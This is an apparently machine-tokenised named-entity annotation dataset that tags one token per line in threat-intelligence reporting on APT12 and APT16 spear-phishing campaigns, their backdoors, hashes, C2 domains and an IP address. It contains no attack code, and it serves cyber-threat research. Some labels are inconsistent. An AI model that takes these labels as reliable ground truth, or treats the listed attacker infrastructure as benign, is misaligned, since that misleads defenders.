+C:\DOCUMENTS O
+and O
+SETTINGS\{user}\LOCAL O
+SETTINGS\Temp\word.exe S-FILE
+; O
+
+APT12 S-APT
+has O
+previously O
+used O
+the O
+THREEBYTE B-MAL
+backdoor E-MAL
+. O
+
+On O
+August O
+25, O
+2014, O
+we O
+observed O
+another O
+round O
+of O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+targeting O
+a O
+high-technology O
+company O
+in O
+Japan S-LOC
+. O
+
+Attached O
+to O
+this O
+email S-TOOL
+was O
+another O
+malicious O
+document O
+that O
+was O
+designed O
+to O
+exploit O
+CVE-2012-0158 S-VULID
+. O
+
+This O
+malicious O
+Word O
+document O
+had O
+an O
+MD5 S-ENCR
+of O
+499bec15ac83f2c8998f03917b63652e S-MD5
+and O
+dropped O
+a O
+backdoor O
+to O
+C:\DOCUMENTS O
+and O
+SETTINGS\{user}\LOCAL O
+SETTINGS\Temp\word.exe S-FILE
+. O
+
+The O
+backdoor O
+had O
+the O
+following O
+properties O
+: O
+
+WATERSPOUT S-MAL
+: O
+
+f9cfda6062a8ac9e332186a7ec0e706a S-MD5
+. O
+
+The O
+backdoor O
+connects O
+to O
+a O
+command O
+and O
+control O
+server O
+at O
+icc.ignorelist.com S-DOM
+. O
+
+Similar O
+to O
+RIPTIDE S-MAL
+and O
+HIGHTIDE S-MAL
+, O
+the O
+WATERSPOUT B-MAL
+backdoor E-MAL
+is O
+an O
+HTTP S-PROT
+based O
+backdoor O
+that O
+communicates O
+with O
+its O
+C2 S-TOOL
+server O
+. O
+
+Although O
+there O
+are O
+no O
+current O
+infrastructure O
+ties O
+to O
+link O
+this O
+backdoor O
+to O
+APT12 S-APT
+, O
+there O
+are O
+several O
+data O
+points O
+that O
+show O
+a O
+possible O
+tie O
+to O
+the O
+same O
+actors O
+: O
+
+Same O
+initial O
+delivery O
+method O
+( O
+spear B-ACT
+phishing E-ACT
+email S-TOOL
+) O
+with O
+a O
+Microsoft S-IDTY
+Word S-TOOL
+Document O
+exploiting O
+CVE-2012-0158 S-VULID
+. O
+
+The O
+same O
+“ O
+Tran B-TOOL
+Duy I-TOOL
+Linh E-TOOL
+” O
+Microsoft S-IDTY
+Word S-TOOL
+Exploit O
+Kit O
+was O
+used O
+in O
+delivery O
+of O
+this O
+backdoor O
+. O
+
+Similar O
+Targets O
+were O
+observed O
+where O
+the O
+threat O
+actors O
+utilized O
+this O
+backdoor O
+: O
+Japanese B-IDTY
+Tech I-IDTY
+Company E-IDTY
+, O
+Taiwanese B-IDTY
+Government E-IDTY
+Organizations O
+, O
+Organizations O
+in O
+the O
+Asia-Pacific B-LOC
+Region E-LOC
+that O
+are O
+of O
+Interest O
+to O
+China S-LOC
+. O
+
+The O
+WATERSPOUT B-MAL
+backdoor E-MAL
+was O
+written O
+to O
+the O
+same O
+file O
+path O
+as O
+the O
+HIGHTIDE B-MAL
+backdoors E-MAL
+: O
+C:\DOCUMENTS O
+and O
+SETTINGS\{user}\LOCAL O
+SETTINGS\Temp\word.exe S-FILE
+, O
+C:\DOCUMENTS O
+and O
+SETTINGS\{user}\LOCAL O
+SETTINGS\Temp\winword.exe S-FILE
+. O
+
+WATERSPOUT S-MAL
+was O
+compiled O
+within O
+two O
+days O
+of O
+the O
+last O
+HIGHTIDE B-MAL
+backdoor E-MAL
+and O
+on O
+the O
+same O
+day O
+as O
+the O
+THREEBYTE B-MAL
+backdoor E-MAL
+. O
+
+APT12 S-APT
+closely O
+monitors O
+online O
+media O
+related O
+to O
+its O
+tools O
+and O
+operations O
+and O
+reacts O
+when O
+its O
+tools O
+are O
+publicly O
+disclosed O
+. O
+
+APT12 S-APT
+has O
+the O
+ability O
+to O
+adapt O
+quickly O
+to O
+public O
+exposures O
+with O
+new O
+tools O
+, O
+tactics O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+. O
+
+Public O
+disclosures O
+may O
+result O
+in O
+an O
+immediate O
+change O
+in O
+APT12 S-APT
+’s O
+tools O
+. O
+
+These O
+changes O
+may O
+be O
+temporary O
+and O
+FireEye S-SECTEAM
+believes O
+they O
+are O
+aimed O
+at O
+decreasing O
+detection O
+of O
+their O
+tools O
+until O
+a O
+more O
+permanent O
+and O
+effective O
+TTP O
+change O
+can O
+be O
+implemented O
+( O
+e.g. O
+, O
+WATERSPOUT S-MAL
+) O
+. O
+
+Although O
+these O
+points O
+do O
+not O
+definitively O
+tie O
+WATERSPOUT S-MAL
+to O
+APT12 S-APT
+, O
+they O
+do O
+indicate O
+a O
+possible O
+connection O
+between O
+the O
+WATERSPOUT S-MAL
+campaign O
+, O
+the O
+THREEBYTE S-MAL
+campaign O
+, O
+and O
+the O
+HIGHTIDE S-MAL
+campaign O
+attributed O
+to O
+APT12 S-APT
+. O
+
+FireEye S-SECTEAM
+believes O
+the O
+change O
+from O
+RIPTIDE S-MAL
+to O
+HIGHTIDE S-MAL
+represents O
+a O
+temporary O
+tool O
+shift O
+to O
+decrease O
+malware O
+detection O
+while O
+APT12 S-APT
+developed O
+a O
+completely O
+new O
+malware O
+toolset O
+. O
+
+These O
+development O
+efforts O
+may O
+have O
+resulted O
+in O
+the O
+emergence O
+of O
+the O
+WATERSPOUT B-MAL
+backdoor E-MAL
+. O
+
+Though O
+public O
+disclosures O
+resulted O
+in O
+APT12 S-APT
+adaptations O
+, O
+FireEye S-SECTEAM
+observed O
+only O
+a O
+brief O
+pause O
+in O
+APT12 S-APT
+activity O
+before O
+the O
+threat O
+actors O
+returned O
+to O
+normal O
+activity O
+levels O
+. O
+
+Similarly O
+, O
+the O
+public O
+disclosure O
+of O
+APT12 S-APT
+’s O
+intrusion O
+at O
+the O
+New B-IDTY
+York I-IDTY
+Times E-IDTY
+also O
+led O
+to O
+only O
+a O
+brief O
+pause O
+in O
+the O
+threat O
+group O
+’s O
+activity O
+and O
+immediate O
+changes O
+in O
+TTPs O
+. O
+
+The O
+pause O
+and O
+retooling O
+by O
+APT12 S-APT
+was O
+covered O
+in O
+the O
+Mandiant S-SECTEAM
+2014 O
+M-Trends S-SECTEAM
+report O
+. O
+
+Currently O
+, O
+APT12 S-APT
+continues O
+to O
+target O
+organizations O
+and O
+conduct O
+cyber O
+operations O
+using O
+its O
+new O
+tools O
+. O
+
+Most O
+recently O
+, O
+FireEye S-SECTEAM
+observed O
+HIGHTIDE S-MAL
+at O
+multiple O
+Taiwan-based O
+organizations O
+and O
+the O
+suspected O
+APT12 S-APT
+WATERSPOUT B-MAL
+backdoor E-MAL
+at O
+a O
+Japan-based O
+electronics O
+company O
+. O
+
+
+APT12 S-APT
+. O
+
+The O
+attackers O
+behind O
+the O
+breach O
+of O
+the O
+New B-IDTY
+York I-IDTY
+Times E-IDTY
+’ O
+computer O
+network O
+late O
+last O
+year O
+appear O
+to O
+be O
+mounting O
+fresh O
+assaults O
+that O
+leverage O
+new O
+and O
+improved O
+versions O
+of O
+malware O
+. O
+
+The O
+new O
+campaigns O
+mark O
+the O
+first O
+significant O
+stirrings O
+from O
+the O
+group O
+since O
+it O
+went O
+silent O
+in O
+January O
+in O
+the O
+wake O
+of O
+a O
+detailed O
+expose O
+of O
+the O
+group O
+and O
+its O
+exploits O
+— O
+and O
+a O
+retooling O
+of O
+what O
+security O
+researchers O
+believe O
+is O
+a O
+massive O
+spying O
+operation O
+based O
+in O
+China S-LOC
+. O
+
+The O
+newest O
+campaign O
+uses O
+updated O
+versions O
+of O
+Aumlib S-MAL
+and O
+Ixeshe S-MAL
+. O
+
+Aumlib S-MAL
+, O
+which O
+for O
+years O
+has O
+been O
+used O
+in O
+targeted O
+attacks O
+, O
+now O
+encodes O
+certain O
+HTTP S-PROT
+communications O
+. O
+
+FireEye S-SECTEAM
+researchers O
+spotted O
+the O
+malware O
+when O
+analyzing O
+a O
+recent O
+attempted O
+attack O
+on O
+an O
+organization O
+involved O
+in O
+shaping O
+economic O
+policy O
+. O
+
+And O
+a O
+new O
+version O
+of O
+Ixeshe S-MAL
+, O
+which O
+has O
+been O
+in O
+service O
+since O
+2009 O
+to O
+attack O
+targets O
+in O
+East B-LOC
+Asia E-LOC
+, O
+uses O
+new O
+network O
+traffic O
+patterns O
+, O
+possibly O
+to O
+evade O
+traditional O
+network O
+security O
+systems O
+. O
+
+The O
+updates O
+are O
+significant O
+for O
+both O
+of O
+the O
+longstanding O
+malware O
+families O
+; O
+before O
+this O
+year O
+, O
+Aumlib S-MAL
+had O
+not O
+changed O
+since O
+at O
+least O
+May O
+2011, O
+and O
+Ixeshe O
+had O
+not O
+evolved O
+since O
+at O
+least O
+December O
+2011 O
+. O
+
+Cybercriminals O
+are O
+constantly O
+evolving O
+and O
+adapting O
+in O
+their O
+attempts O
+to O
+bypass O
+computer O
+network O
+defenses O
+. O
+
+But O
+, O
+larger O
+, O
+more O
+successful O
+threat O
+actors O
+tend O
+to O
+evolve O
+at O
+a O
+slower O
+rate O
+. O
+
+As O
+long O
+as O
+these O
+actors O
+regularly O
+achieve O
+their O
+objective O
+( O
+stealing O
+sensitive O
+data O
+) O
+, O
+they O
+are O
+not O
+motivated O
+to O
+update O
+or O
+rethink O
+their O
+techniques O
+, O
+tactics O
+, O
+or O
+procedures O
+( O
+TTPs O
+) O
+. O
+
+These O
+threat O
+actors O
+’ O
+tactics O
+follow O
+the O
+same O
+principles O
+of O
+evolution O
+– O
+successful O
+techniques O
+propagate O
+, O
+and O
+unsuccessful O
+ones O
+are O
+abandoned O
+. O
+
+Attackers O
+do O
+not O
+change O
+their O
+approach O
+unless O
+an O
+external O
+force O
+or O
+environmental O
+shift O
+compels O
+them O
+to O
+. O
+
+As O
+the O
+old O
+saying O
+goes O
+: O
+If O
+it O
+ain’t O
+broke O
+, O
+don’t O
+fix O
+it O
+. O
+
+So O
+when O
+a O
+larger O
+, O
+successful O
+threat O
+actor O
+changes O
+up O
+tactics O
+, O
+the O
+move O
+always O
+piques O
+our O
+attention O
+. O
+
+Naturally O
+, O
+our O
+first O
+priority O
+is O
+ensuring O
+that O
+we O
+detect O
+the O
+new O
+or O
+altered O
+TTPs O
+. O
+
+But O
+we O
+also O
+attempt O
+to O
+figure O
+out O
+why O
+the O
+adversary O
+changed O
+— O
+what O
+broke? O
+— O
+so O
+that O
+we O
+can O
+predict O
+if O
+and O
+when O
+they O
+will O
+change O
+again O
+in O
+the O
+future O
+. O
+
+We O
+observed O
+an O
+example O
+of O
+this O
+phenomenon O
+around O
+May O
+. O
+
+About O
+four O
+months O
+after O
+The O
+New B-IDTY
+York I-IDTY
+Times E-IDTY
+publicized O
+an O
+attack O
+on O
+its O
+network O
+, O
+the O
+attackers O
+behind O
+the O
+intrusion O
+deployed O
+updated O
+versions O
+of O
+their O
+Backdoor.APT.Aumlib S-FILE
+and O
+Backdoor.APT.Ixeshe S-FILE
+malware O
+families O
+. O
+
+The O
+previous O
+versions O
+of O
+Aumlib S-MAL
+had O
+not O
+changed O
+since O
+at O
+least O
+May O
+2011, O
+and O
+Ixeshe O
+had O
+not O
+evolved O
+since O
+at O
+least O
+December O
+2011 O
+. O
+
+We O
+cannot O
+say O
+for O
+sure O
+whether O
+the O
+attackers O
+were O
+responding O
+to O
+the O
+scrutiny O
+they O
+received O
+in O
+the O
+wake O
+of O
+the O
+episode O
+. O
+
+But O
+we O
+do O
+know O
+the O
+change O
+was O
+sudden O
+. O
+
+Akin O
+to O
+turning O
+a O
+battleship O
+, O
+retooling O
+TTPs O
+of O
+large O
+threat O
+actors O
+is O
+formidable O
+. O
+
+Such O
+a O
+move O
+requires O
+recoding O
+malware O
+, O
+updating O
+infrastructure O
+, O
+and O
+possibly O
+retraining O
+workers O
+on O
+new O
+processes O
+. O
+
+The O
+following O
+sections O
+detail O
+the O
+changes O
+to O
+Backdoor.APT.Aumlib S-FILE
+and O
+Backdoor.APT.Ixeshe S-FILE
+. O
+
+Backdoor.APT.Aumlib S-FILE
+: O
+
+A O
+recently O
+observed O
+malware O
+sample O
+( O
+hash O
+value O
+832f5e01be536da71d5b3f7e41938cfb S-MD5
+) O
+appears O
+to O
+be O
+a O
+modified O
+variant O
+of O
+Aumlib S-MAL
+. O
+
+The O
+sample O
+, O
+which O
+was O
+deployed O
+against O
+an O
+organization O
+involved O
+in O
+shaping O
+economic O
+policy O
+, O
+was O
+downloaded O
+from O
+the O
+following O
+URL O
+: O
+
+status.acmetoy.com S-URL
+/DD/ O
+myScript.js S-FILE
+or O
+status.acmetoy.com S-URL
+/DD/ O
+css.css S-FILE
+. O
+
+This O
+output O
+reveals O
+the O
+following O
+changes O
+when O
+compared O
+with O
+earlier O
+variants O
+: O
+
+The O
+POST O
+URI O
+is O
+changed O
+to O
+/bbs/ O
+search.asp S-FILE
+( O
+as O
+mentioned O
+, O
+earlier O
+Aumlib S-MAL
+variants O
+used O
+a O
+POST O
+URI O
+of O
+/bbs/ O
+info.asp S-FILE
+. O
+) O
+The O
+POST O
+body O
+is O
+now O
+encoded O
+. O
+
+These O
+subtle O
+changes O
+may O
+be O
+enough O
+to O
+circumvent O
+existing O
+IDS O
+signatures O
+designed O
+to O
+detect O
+older O
+variants O
+of O
+the O
+Aumlib S-MAL
+family O
+. O
+
+The O
+sample O
+832f5e01be536da71d5b3f7e41938cfb S-MD5
+shares O
+code O
+with O
+an O
+older O
+Aumlib S-MAL
+variant O
+with O
+the O
+hash O
+cb3dcde34fd9ff0e19381d99b02f9692 S-MD5
+. O
+
+The O
+sample O
+cb3dcde34fd9ff0e19381d99b02f9692 S-MD5
+connected O
+to O
+documents.myPicture.info S-URL
+and O
+www.documents.myPicture.info S-URL
+and O
+as O
+expected O
+generated O
+the O
+a O
+POST O
+request O
+to O
+/bbs/ O
+info.asp S-FILE
+. O
+
+Backdoor.APT.Ixeshe S-FILE
+: O
+
+Ixeshe S-MAL
+has O
+been O
+used O
+in O
+targeted O
+attacks O
+since O
+2009, O
+often O
+against O
+entities O
+in O
+East B-LOC
+Asia E-LOC
+. O
+
+The O
+network O
+traffic O
+is O
+encoded O
+with O
+a O
+custom O
+Base64 S-ENCR
+alphabet O
+. O
+
+We O
+analyzed O
+a O
+recent O
+sample O
+that O
+appears O
+to O
+have O
+targeted O
+entities O
+in O
+Taiwan S-LOC
+, O
+a O
+target O
+consistent O
+with O
+previous O
+Ixeshe S-MAL
+activity O
+. O
+
+This O
+sample O
+( O
+aa873ed803ca800ce92a39d9a683c644 S-MD5
+) O
+exhibited O
+network O
+traffic O
+that O
+does O
+not O
+match O
+the O
+earlier O
+pattern O
+and O
+therefore O
+may O
+evade O
+existing O
+network O
+traffic O
+signatures O
+designed O
+to O
+detect O
+Ixeshe S-MAL
+related O
+infections O
+. O
+
+
+APT16 S-APT
+. O
+
+Between O
+November O
+26, O
+2015, O
+and O
+December O
+1, O
+2015, O
+known O
+and O
+suspected O
+China S-LOC
+based O
+APT O
+groups O
+launched O
+several O
+spear B-ACT
+phishing E-ACT
+attacks O
+targeting O
+Japanese O
+and O
+Taiwanese O
+organizations O
+in O
+the O
+high-tech O
+, O
+government O
+services O
+, O
+media O
+and O
+financial O
+services O
+industries O
+. O
+
+Each O
+campaign O
+delivered O
+a O
+malicious O
+Microsoft S-IDTY
+Word S-TOOL
+document O
+exploiting O
+the O
+aforementioned O
+EPS S-TOOL
+dict O
+copy O
+use-after-free O
+vulnerability O
+, O
+and O
+the O
+local O
+Windows S-OS
+privilege O
+escalation O
+vulnerability O
+CVE-2015-1701 S-VULID
+. O
+
+The O
+successful O
+exploitation O
+of O
+both O
+vulnerabilities O
+led O
+to O
+the O
+delivery O
+of O
+either O
+a O
+downloader O
+that O
+we O
+refer O
+to O
+as O
+IRONHALO S-MAL
+, O
+or O
+a O
+backdoor O
+that O
+we O
+refer O
+to O
+as O
+ELMER S-MAL
+. O
+
+On O
+November O
+26, O
+2015, O
+a O
+suspected O
+China S-LOC
+based O
+APT O
+group O
+sent O
+Japanese O
+defense O
+policy-themed O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+multiple O
+Japanese O
+financial O
+and O
+high-tech O
+companies O
+. O
+
+As O
+shown O
+in O
+Figure O
+1, O
+the O
+emails S-TOOL
+originated O
+from O
+the O
+Yahoo S-IDTY
+! O
+email S-TOOL
+address O
+mts03282000@yahoo.co.jp S-EMAIL
+, O
+and O
+contained O
+the O
+subject O
+“ O
+Sending O
+of O
+New O
+Year O
+No
+. O
+
+Foreword O
+” O
+. O
+
+Each O
+phishing E-ACT
+message O
+contained O
+the O
+same O
+malicious O
+Microsoft S-IDTY
+Word S-TOOL
+attachment O
+. O
+
+The O
+malicious O
+attachment O
+resembled O
+an O
+article O
+hosted O
+on O
+a O
+legitimate O
+Japanese O
+defense-related O
+website O
+, O
+as O
+both O
+discussed O
+national O
+defense O
+topics O
+and O
+carried O
+the O
+same O
+byline O
+. O
+
+The O
+lure O
+documents O
+also O
+used O
+the O
+Japanese O
+calendar O
+, O
+as O
+indicated O
+by O
+the O
+27th O
+year O
+in O
+the O
+Heisei O
+period O
+. O
+
+This O
+demonstrates O
+that O
+the O
+threat O
+actors O
+understand O
+conventional O
+Japanese O
+date O
+notation O
+. O
+
+Following O
+the O
+exploitation O
+of O
+the O
+EPS S-TOOL
+and O
+CVE-2015-1701 S-VULID
+vulnerabilities O
+, O
+the O
+exploit O
+payload O
+drops O
+either O
+a O
+32-bit O
+or O
+64-bit O
+binary O
+containing O
+an O
+embedded O
+IRONHALO S-MAL
+malware O
+sample O
+. O
+
+IRONHALO S-MAL
+is O
+a O
+downloader O
+that O
+uses O
+the O
+HTTP S-PROT
+protocol O
+to O
+retrieve O
+a O
+Base64 S-ENCR
+encoded O
+payload O
+from O
+a O
+hard-coded O
+command-and-control S-TOOL
+( O
+C2 S-TOOL
+) O
+server O
+and O
+uniform O
+resource O
+locator O
+( O
+URL O
+) O
+path O
+. O
+
+The O
+encoded O
+payload O
+is O
+written O
+to O
+a O
+temporary O
+file O
+, O
+decoded O
+and O
+executed O
+in O
+a O
+hidden O
+window O
+. O
+
+The O
+encoded O
+and O
+decoded O
+payloads O
+are O
+written O
+to O
+files O
+named O
+igfxHK[%rand%].dat S-FILE
+and O
+igfxHK[%rand%].exe S-FILE
+respectively O
+, O
+where O
+[%rand%] O
+is O
+a O
+4-byte O
+hexadecimal O
+number O
+based O
+on O
+the O
+current O
+timestamp O
+. O
+
+IRONHALO S-MAL
+: O
+AcroRd32Info.exe.exe S-FILE
+a8ccb2fc5fec1b89f778d93096f8dd65 S-MD5
+. O
+
+IRONHALO S-MAL
+persists O
+by O
+copying O
+itself O
+to O
+the O
+current O
+user O
+’s O
+Startup S-TOOL
+folder O
+. O
+
+This O
+variant O
+sends O
+an O
+HTTP S-PROT
+request O
+to O
+a O
+legitimate O
+Japanese O
+website O
+using O
+a O
+malformed O
+User-Agent S-TOOL
+string O
+, O
+as O
+shown O
+in O
+Figure O
+2 O
+. O
+
+The O
+threat O
+actors O
+likely O
+compromised O
+the O
+legitimate O
+site O
+and O
+attempted O
+to O
+use O
+it O
+as O
+a O
+staging O
+server O
+for O
+second-stage O
+payloads O
+. O
+
+On O
+December O
+1, O
+2015, O
+threat O
+actors O
+launched O
+two O
+additional O
+spear B-ACT
+phishing E-ACT
+attacks O
+exploiting O
+the O
+undisclosed O
+EPS S-TOOL
+vulnerability O
+and O
+CVE-2015-1701 S-VULID
+. O
+
+Unlike O
+the O
+Nov. O
+26 O
+campaign O
+, O
+these O
+attacks O
+targeted O
+Taiwanese O
+governmental O
+and O
+media O
+and O
+entertainment O
+organizations O
+. O
+
+Moreover O
+, O
+the O
+exploit O
+dropped O
+a O
+different O
+malware O
+payload O
+, O
+a O
+backdoor O
+we O
+refer O
+to O
+as O
+ELMER S-MAL
+. O
+
+The O
+first O
+spear B-ACT
+phishing E-ACT
+message O
+was O
+sent O
+to O
+a O
+Taiwanese O
+governmental O
+employee O
+on O
+Dec. O
+1 O
+. O
+
+The O
+attachment O
+was O
+created O
+using O
+the O
+traditional O
+Chinese O
+character O
+set O
+, O
+and O
+contained O
+a O
+flowchart O
+that O
+appeared O
+to O
+be O
+taken O
+from O
+the O
+legitimate O
+Taiwanese B-IDTY
+government E-IDTY
+auction O
+website O
+http://shwoo.gov.taipei/buyer_flowchart.asp S-URL
+. O
+
+The O
+second O
+December O
+spear B-ACT
+phishing E-ACT
+attack O
+targeted O
+Taiwan S-LOC
+based O
+news O
+media O
+organizations O
+. O
+
+The O
+emails S-TOOL
+originated O
+from O
+the O
+address O
+dpptccb.dpp@msa.hinet.net S-EMAIL
+, O
+and O
+contained O
+the O
+subject O
+DPP's O
+Contact O
+Information O
+Update O
+. O
+
+Based O
+on O
+the O
+email S-TOOL
+address O
+naming O
+convention O
+and O
+message O
+subject O
+, O
+the O
+threat O
+actors O
+may O
+have O
+tried O
+to O
+make O
+the O
+message O
+appear O
+to O
+be O
+a O
+legitimate O
+communication O
+from O
+the O
+Democratic O
+Progressive O
+Party O
+( O
+DPP O
+) O
+, O
+Taiwan S-LOC
+’s O
+opposition O
+party O
+. O
+
+Unlike O
+the O
+previous O
+exploit O
+documents O
+, O
+this O
+malicious O
+attachment O
+did O
+not O
+contain O
+any O
+visible O
+text O
+when O
+opened O
+in O
+Microsoft S-IDTY
+Word S-TOOL
+. O
+
+The O
+exploit O
+documents O
+delivered O
+during O
+the O
+December O
+campaigns O
+dropped O
+a O
+binary O
+containing O
+an O
+embedded O
+variant O
+of O
+a O
+backdoor O
+we O
+refer O
+to O
+as O
+ELMER S-MAL
+. O
+
+ELMER S-MAL
+is O
+a O
+non-persistent O
+proxy-aware O
+HTTP S-PROT
+backdoor O
+written O
+in O
+Delphi S-TOOL
+, O
+and O
+is O
+capable O
+of O
+performing O
+file O
+uploads O
+and O
+downloads O
+, O
+file O
+execution O
+, O
+and O
+process O
+and O
+directory O
+listings O
+. O
+
+To O
+retrieve O
+commands O
+, O
+ELMER S-MAL
+sends O
+HTTP S-PROT
+GET O
+requests O
+to O
+a O
+hard-coded O
+C2 S-TOOL
+server O
+, O
+and O
+parses O
+the O
+HTTP S-PROT
+response O
+packets O
+received O
+from O
+the O
+C2 S-TOOL
+server O
+for O
+an O
+integer O
+string O
+corresponding O
+to O
+the O
+command O
+that O
+needs O
+to O
+be O
+executed O
+. O
+
+Table O
+2 O
+lists O
+the O
+ELMER B-MAL
+backdoors E-MAL
+observed O
+during O
+the O
+December O
+campaigns O
+. O
+
+The O
+ELMER S-MAL
+variant O
+6c33223db475f072119fe51a2437a542 S-MD5
+beaconed O
+to O
+the O
+C2 S-TOOL
+IP O
+address O
+121.127.249.74 S-IP
+over O
+port O
+443 O
+. O
+
+
+APT16 S-APT
+. O
+
+While O
+attribution O
+of O
+the O
+first O
+two O
+spear B-ACT
+phishing E-ACT
+attacks O
+is O
+still O
+uncertain O
+, O
+we O
+attribute O
+the O
+second O
+December O
+phishing E-ACT
+campaign O
+to O
+the O
+China S-LOC
+based O
+APT O
+group O
+that O
+we O
+refer O
+to O
+as O
+APT16 S-APT
+. O
+
+This O
+is O
+based O
+on O
+the O
+use O
+of O
+the O
+known O
+APT16 S-APT
+domain O
+rinpocheinfo.com S-DOM
+, O
+as O
+well O
+as O
+overlaps O
+in O
+previously O
+observed O
+targeting O
+and O
+tactics O
+, O
+techniques O
+and O
+procedures O
+( O
+TTPs O
+) O
+. O
+
+Taiwanese O
+citizens O
+will O
+go O
+to O
+the O
+polls O
+on O
+January O
+16 O
+, O
+2016 O
+, O
+to O
+choose O
+a O
+new O
+President O
+and O
+legislators O
+. O
+
+According O
+to O
+recent O
+opinion O
+polls O
+, O
+the O
+Democratic B-IDTY
+Progressive I-IDTY
+Party E-IDTY
+( O
+DPP S-IDTY
+) O
+candidate O
+Tsai O
+Ing-wen O
+is O
+leading O
+her O
+opponents O
+and O
+is O
+widely O
+expected O
+to O
+win O
+the O
+election O
+. O
+
+The O
+DPP O
+is O
+part O
+of O
+the O
+pan-green O
+coalition O
+that O
+favors O
+Taiwanese O
+independence O
+over O
+reunification O
+with O
+the O
+mainland O
+, O
+and O
+the O
+party O
+’s O
+victory O
+would O
+represent O
+a O
+shift O
+away O
+from O
+the O
+ruling O
+Kuomintang O
+’s O
+closer O
+ties O
+with O
+the O
+PRC S-IDTY
+. O
+
+Since O
+1949 O
+, O
+Beijing S-LOC
+has O
+claimed O
+Taiwan S-LOC
+as O
+a O
+part O
+of O
+China S-LOC
+and O
+strongly O
+opposes O
+any O
+action O
+toward O
+independence O
+. O
+
+The O
+Chinese B-IDTY
+government E-IDTY
+is O
+therefore O
+concerned O
+whether O
+a O
+DPP S-IDTY
+victory O
+might O
+weaken O
+the O
+commercial O
+and O
+tourism O
+ties O
+between O
+China S-LOC
+and O
+Taiwan S-LOC
+, O
+or O
+even O
+drive O
+Taiwan S-LOC
+closer O
+to O
+independence O
+. O
+
+In O
+2005 O
+, O
+the O
+Chinese B-IDTY
+government E-IDTY
+passed O
+an O
+“ O
+anti-secession O
+” O
+law O
+that O
+signified O
+its O
+intention O
+to O
+use O
+“ O
+non-peaceful O
+” O
+means O
+to O
+stymie O
+any O
+Taiwanese O
+attempt O
+to O
+secede O
+from O
+China S-LOC
+. O
+
+APT16 S-APT
+actors O
+sent O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+to O
+two O
+Taiwanese O
+media O
+organization O
+addresses O
+and O
+three O
+webmail O
+addresses O
+. O
+
+The O
+message O
+subject O
+read O
+“ O
+DPP S-IDTY
+’s O
+Contact O
+Information O
+Update O
+” O
+, O
+apparently O
+targeting O
+those O
+interested O
+in O
+contact O
+information O
+for O
+DPP S-IDTY
+members O
+or O
+politicians O
+. O
+
+The O
+Chinese B-IDTY
+government E-IDTY
+would O
+benefit O
+from O
+improved O
+insight O
+into O
+local O
+media O
+coverage O
+of O
+Taiwanese O
+politics O
+, O
+both O
+to O
+better O
+anticipate O
+the O
+election O
+outcome O
+and O
+to O
+gather O
+additional O
+intelligence O
+on O
+politicians O
+, O
+activists O
+, O
+and O
+others O
+who O
+interact O
+with O
+journalists O
+. O
+
+This O
+tactic O
+is O
+not O
+without O
+precedent O
+; O
+in O
+2013 O
+, O
+the O
+New B-IDTY
+York I-IDTY
+Times E-IDTY
+revealed O
+it O
+had O
+been O
+the O
+target O
+of O
+China S-LOC
+based O
+actors O
+shortly O
+after O
+it O
+reported O
+on O
+the O
+alleged O
+mass O
+accumulation O
+of O
+wealth O
+by O
+then-Prime O
+Minister O
+Wen O
+Jiabao O
+and O
+his O
+family O
+. O
+
+The O
+actors O
+likely O
+sought O
+information O
+on O
+the O
+newspaper O
+’s O
+sources O
+in O
+China S-LOC
+, O
+who O
+could O
+be O
+silenced O
+by O
+the O
+government O
+. O
+
+Compromising O
+these O
+Taiwanese O
+news O
+organizations O
+would O
+also O
+allow O
+the O
+actors O
+to O
+gain O
+access O
+to O
+informants O
+or O
+other O
+protected O
+sources O
+, O
+who O
+might O
+then O
+be O
+targeted O
+for O
+further O
+intelligence O
+collection O
+or O
+even O
+retribution O
+. O
+
+The O
+webmail O
+addresses O
+, O
+while O
+unknown O
+, O
+were O
+possibly O
+the O
+personal-use O
+addresses O
+of O
+the O
+individuals O
+whose O
+corporate O
+domain O
+emails S-TOOL
+were O
+targeted O
+. O
+
+As O
+corporate O
+networks O
+become O
+more O
+secure O
+and O
+users O
+become O
+more O
+vigilant O
+, O
+personal O
+accounts O
+can O
+still O
+offer O
+a O
+means O
+to O
+bypass O
+security O
+systems O
+. O
+
+This O
+tactic O
+exploits O
+users O
+’ O
+reduced O
+vigilance O
+when O
+reading O
+their O
+own O
+personal O
+email S-TOOL
+, O
+even O
+when O
+using O
+corporate O
+IT O
+equipment O
+to O
+do O
+so O
+. O
+
+On O
+the O
+same O
+date O
+that O
+APT16 S-APT
+targeted O
+Taiwanese O
+media O
+, O
+suspected O
+Chinese O
+APT O
+actors O
+also O
+targeted O
+a O
+Taiwanese B-IDTY
+government E-IDTY
+agency O
+, O
+sending O
+a O
+lure O
+document O
+that O
+contained O
+instructions O
+for O
+registration O
+and O
+subsequent O
+listing O
+of O
+goods O
+on O
+a O
+local O
+Taiwanese O
+auction O
+website O
+. O
+
+It O
+is O
+possible O
+, O
+although O
+not O
+confirmed O
+, O
+that O
+APT16 S-APT
+was O
+also O
+responsible O
+for O
+targeting O
+this O
+government O
+agency O
+, O
+given O
+both O
+the O
+timeframe O
+and O
+the O
+use O
+of O
+the O
+same O
+n-day O
+to O
+eventually O
+deploy O
+the O
+ELMER B-MAL
+backdoor E-MAL
+. O
+
+One O
+of O
+the O
+media O
+organizations O
+involved O
+in O
+this O
+latest O
+activity O
+was O
+targeted O
+in O
+June O
+2015 O
+, O
+while O
+its O
+Hong O
+Kong O
+branch O
+was O
+similarly O
+targeted O
+in O
+August O
+2015 O
+. O
+
+APT16 S-APT
+actors O
+were O
+likely O
+also O
+responsible O
+for O
+the O
+June O
+2015 O
+activity O
+. O
+
+They O
+sent O
+spear B-ACT
+phishing E-ACT
+messages O
+with O
+the O
+subject O
+“ O
+2015 O
+Taiwan S-LOC
+Security O
+and O
+Cultural O
+Forum O
+Invitation O
+Form O
+” O
+, O
+and O
+used O
+a O
+different O
+tool O
+– O
+a O
+tool O
+that O
+we O
+refer O
+to O
+as O
+DOORJAMB S-MAL
+– O
+in O
+their O
+attempt O
+to O
+compromise O
+the O
+organization O
+. O
+
+A O
+different O
+group O
+, O
+known O
+as O
+admin@338 S-EMAIL
+, O
+used O
+LOWBALL S-MAL
+malware O
+during O
+its O
+Hong B-LOC
+Kong E-LOC
+activity O
+. O
+
+Despite O
+the O
+differing O
+sponsorship O
+, O
+penetration O
+of O
+Hong B-LOC
+Kong E-LOC
+and O
+Taiwan S-LOC
+based O
+media O
+organizations O
+continues O
+to O
+be O
+a O
+priority O
+for O
